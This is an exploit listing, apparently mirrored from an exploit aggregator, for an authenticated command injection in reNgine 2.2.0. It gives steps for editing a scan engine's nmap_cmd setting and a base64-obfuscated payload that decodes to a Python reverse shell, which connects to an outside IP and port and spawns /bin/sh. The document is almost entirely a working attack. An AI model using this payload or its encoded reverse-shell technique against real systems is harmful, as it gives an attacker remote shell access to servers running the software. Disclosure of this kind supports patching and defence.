Exploit for reNgine 2.2.0 Command Injection

Name: Exploit for reNgine 2.2.0 Command Injection
Rating: 5 (102 reviews)

2024-10-03 | CVSS 7.4

## https://sploitus.com/exploit?id=PACKETSTORM:181988
# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)  
# Date: 2024-09-29  
# Exploit Author: Caner Tercan  
# Vendor Homepage: https://rengine.wiki/  
# Software Link: https://github.com/yogeshojha/rengine  
# Version: v2.2.0  
# Tested on: macOS  
  
POC :   
  
1. Login the Rengine Platform  
2. Click the Scan Engine  
3. Modify any Scan Engine  
4. I modified nmap_cmd parameters on yml config  
5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.  
  
payload :  
  
'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #’